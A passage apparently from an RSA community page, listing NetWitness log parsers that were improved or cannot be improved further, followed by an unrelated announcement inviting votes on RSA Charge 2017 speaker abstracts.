  • Microsoft-Microsoft Windows using Eventing Collection
  • Microsoft-Microsoft Windows using: Adiscon Event Reporter
  • Microsoft-Microsoft Windows using: Intersect Alliance SNARE
  • Oracle-Oracle Access Manager
  • Oracle-Oracle Database
  • Oracle-Sun Solaris
  • Trend Micro-Trend Micro Control Manager
  • Tripwire-Tripwire Enterprise
  • UnboundID - UnboundID Identity Data Store
  • Vmware-VMware ESX/ESXi
  • Vmware-VMware vCenter Server
  • Voltage SecureData
  • Websense-Websense Web Security




Here is the list of 12 Log Parsers that cannot be improved further:

  • Check Point-Check Point IPSO (nokiaipso)
  • Cisco-Cisco Router/Switch
  • Citrix-Citrix NetScaler
  • F5-F5 Big IP (Local Traffic Manager)
  • Infoblox-Infoblox NIOS
  • Juniper-Juniper Networks JUNOS
  • McAfee-McAfee ePolicy Orchestrator
  • McAfee-McAfee Web Gateway
  • Palo Alto Networks-Palo Alto Networks Enterprise Firewall
  • Red Hat Linux (RHEL)
  • RSA Authentication Manager/UCM (rsaacesrv)
  • Symantec-Symantec Endpoint Protection


Most of these contain highly unstructured Log formats. Due to several Backwards Compatibility / Performance impact issues, these couldn't be improved.


Please note that these 12 Log Parsers are expected to generate unknown messages. The team depends on the incoming support requests for updating these parsers. Once these requests are received, the team will get them updated as soon as possible.



The RSA NetWitness Log Parsing team will closely monitor incoming requests for the improved Log Parsers and further improve them as applicable. They will continue to extend these improvements to other supported Log Parsers in the library.

RSA Charge 2017’s ‘Call for Speakers’ resulted in an unprecedented number of abstract submissions across all RSA product solutions – RSA Archer Suite, RSA NetWitness Suite, RSA SecurID Suite (including RSA Identity Governance & Lifecycle), and RSA Fraud & Risk Intelligence. The submissions from RSA customers and partners included the sharing of first-hand knowledge, advice, ideas, experiences, case studies, and even war stories that submitters wanted to share with their RSA product peers at the Charge event in October.


Though the RSA Charge Program Selection Committee is thrilled by the high caliber of submissions, the Committee now faces the hard task of whittling down the list of submissions to 100 across all RSA products. Though no final decisions have yet been made, the Committee noticed that many submissions had similar titles and themes, so they decided to give you the opportunity to ‘voice your choice’ from a small, random subset of the abstracts received.


And, for the first time, with a registered RSA Link account, you can vote on Tracks across the entire RSA product portfolio. That’s right, you can vote on any of the product Tracks listed, but you can only vote once ‘per abstract.’


So let your voice be heard - this is your chance to 'vote your choice' and have a say in this year's RSA Charge 2017 Agenda. To vote, simply click on the Proposal Abstracts and cast your vote across all RSA Product Tracks.


Thank you for the amazing ‘Call for Speakers’ submissions for RSA Charge 2017 – it’s going to be an event you will not want to miss. If you haven’t registered for RSA Charge 2017, be sure to do so today!  

